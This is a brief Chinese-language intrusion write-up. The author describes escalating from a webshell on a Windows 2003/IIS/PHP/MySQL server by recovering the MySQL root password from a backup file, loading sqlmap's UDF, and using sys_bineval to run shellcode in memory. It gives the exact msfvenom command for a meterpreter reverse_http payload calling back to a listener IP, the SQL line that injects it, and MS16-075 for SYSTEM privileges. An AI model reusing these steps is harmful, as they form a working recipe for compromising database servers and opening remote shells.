0x01
拿到shell,先摸清环境1
win03+iis6+apache+php+mysql
查看被禁用函数1
System,exec,passthru
尝试使用未被禁用函数以及调用com,asp等皆无法执行命令
0x02
从某个盘的数据库备份文件翻到mysql的root密码,经过尝试发现被降权了,不过能导出udf,进而尝试创建函数执行命令,在使用sys_exec,sys_eval执行命令的时候………mysql炸了,没错,炸了,执行一次炸一次,而且并未成功执行命令
目光转向开放端口1
280
3306
将root开启外连,使用sqlmap -d 进行连接,os-shell尝试执行命令,依然爆炸,将sqlmap的udf丢进winhex查看函数列表,发现有个函数(sys_bineval)可以进行内存加载shellcode,随即定位到sqlmap的os-pwn功能,使用这个功能的时候,首先尝试了几次未成功反弹shell,经过本地测试和实战测试对比并使用 -v 3进行debug,发现实战中os-pwn反弹shell的时候并未调用sys_bineval执行shellcode,本地测试也是偶尔可行(垃圾sqlmap)
0x03
本地测试debug拿到payload,进行手工构造payload进行反弹shell1
msfvenom -p windows/meterpreter/reverse_http EXITFUNC=thread LPORT=8080 LHOST=172.16.229.139 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > test ;cat test |xxd -c 9999 -ps
反弹shell1
Select sys_bineval(0x填这);
0x04
Ms16-075 getsystem